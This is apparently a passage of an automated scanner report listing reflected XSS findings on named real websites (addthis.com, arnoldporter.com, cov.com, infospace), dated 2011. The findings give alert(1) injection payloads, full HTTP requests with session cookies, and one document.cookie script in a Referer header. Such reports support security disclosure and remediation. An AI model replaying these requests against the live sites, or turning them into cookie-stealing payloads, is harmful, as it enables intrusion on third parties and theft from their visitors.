The value of the submitid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9b6d'%3balert(1)//dd5166876a6 was submitted in the submitid1 parameter. This input was echoed as c9b6d';alert(1)//dd5166876a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkwc9b6d'%3balert(1)//dd5166876a6 HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12d9b<script>alert(1)</script>893317d02a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php12d9b<script>alert(1)</script>893317d02a5 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:26:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ukeipc25sb6n7ajap5tqd3fsa1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.php12d9b<script>alert(1)</script>893317d02a5</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8866e"-alert(1)-"49ee98219f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php8866e"-alert(1)-"49ee98219f7 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:26:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=tioju43rv1im39822nkpbqlp26; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php8866e"-alert(1)-"49ee98219f7"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
4.68. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.addthis.com
Path: /bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4591f"-alert(1)-"57e0244f404 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/4591f"-alert(1)-"57e0244f404 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:26:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 92401
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/4591f"-alert(1)-"57e0244f404"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
4.69. http://www.arnoldporter.com/practices.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.arnoldporter.com
Path: /practices.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32e6e"><script>alert(1)</script>277857ca11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /practices.cfm?u=FinancialServices&action=view&id=476&32e6e"><script>alert(1)</script>277857ca11c=1 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:28:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8e37"><script>alert(1)</script>b1acff3e126 was submitted in the u parameter. This input was echoed as e8e37\"><script>alert(1)</script>b1acff3e126 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /practices.cfm?u=FinancialServicese8e37"><script>alert(1)</script>b1acff3e126&action=view&id=476 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
4.71. http://www.arnoldporter.com/publications.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.arnoldporter.com
Path: /publications.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59ef8"><script>alert(1)</script>f0da3e29c6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /publications.cfm?action=search&search_publication_type_id=advisory&59ef8"><script>alert(1)</script>f0da3e29c6c=1 HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=41801191; __utmz=248117591.1295449755.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263646; __utma=248117591.1964504674.1295449755.1295449755.1295449755.1; __utmc=248117591; __utmb=248117591.1.10.1295449755; sifrFetch=true;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:27:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
4.72. http://www.cov.com/about_the_firm/firm_history [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /about_the_firm/firm_history
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3824'-alert(1)-'1b19dddffc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about_the_firm/firm_history?b3824'-alert(1)-'1b19dddffc8=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | About the Firm | Firm History</title> <meta na ...[SNIP]... about_the_firm/firm_history/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/about_the_firm/firm_history/AboutSection.aspx?b3824'-alert(1)-'1b19dddffc8=1';//]]> ...[SNIP]...
4.73. http://www.cov.com/balancingworkandfamilylife [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /balancingworkandfamilylife
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec112'-alert(1)-'d654b8e90b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /balancingworkandfamilylife?ec112'-alert(1)-'d654b8e90b6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.74. http://www.cov.com/bestviewed [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /bestviewed
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e18d5'-alert(1)-'b19132c4a4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bestviewed?e18d5'-alert(1)-'b19132c4a4f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.75. http://www.cov.com/biographies [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /biographies
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3b19'-alert(1)-'10a178ca3f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /biographies?c3b19'-alert(1)-'10a178ca3f5=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.76. http://www.cov.com/diversityoverview [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /diversityoverview
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c748'-alert(1)-'750bc24037f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /diversityoverview?8c748'-alert(1)-'750bc24037f=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.77. http://www.cov.com/diversityupdate [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /diversityupdate
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2d31'-alert(1)-'bf8e984b8ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /diversityupdate?c2d31'-alert(1)-'bf8e984b8ec=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.78. http://www.cov.com/extranet [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /extranet
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f529'-alert(1)-'c70c33782c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /extranet?6f529'-alert(1)-'c70c33782c6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.79. http://www.cov.com/firmoverview [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /firmoverview
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d58f'-alert(1)-'8538235fe28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /firmoverview?9d58f'-alert(1)-'8538235fe28=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
Response
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html> <head> <title id="ctl00_htmlTitle">Covington & Burling LLP | About the Firm | Firm Overview</title> <meta n ...[SNIP]... ocument.aspnetForm.action = '/firmoverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/firmoverview/AboutSection.aspx?9d58f'-alert(1)-'8538235fe28=1';//]]> ...[SNIP]...
4.80. http://www.cov.com/forum [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /forum
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb6be'-alert(1)-'7a5f32d74e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /forum?cb6be'-alert(1)-'7a5f32d74e6=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.81. http://www.cov.com/honorsrankings [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /honorsrankings
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4088'-alert(1)-'6fb7096a36d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /honorsrankings?f4088'-alert(1)-'6fb7096a36d=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.82. http://www.cov.com/leadersindiversity [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /leadersindiversity
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cac5'-alert(1)-'90719ebe248 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /leadersindiversity?1cac5'-alert(1)-'90719ebe248=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;
4.83. http://www.cov.com/legalnotices [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cov.com
Path: /legalnotices
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0792'-alert(1)-'83d5d12175f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
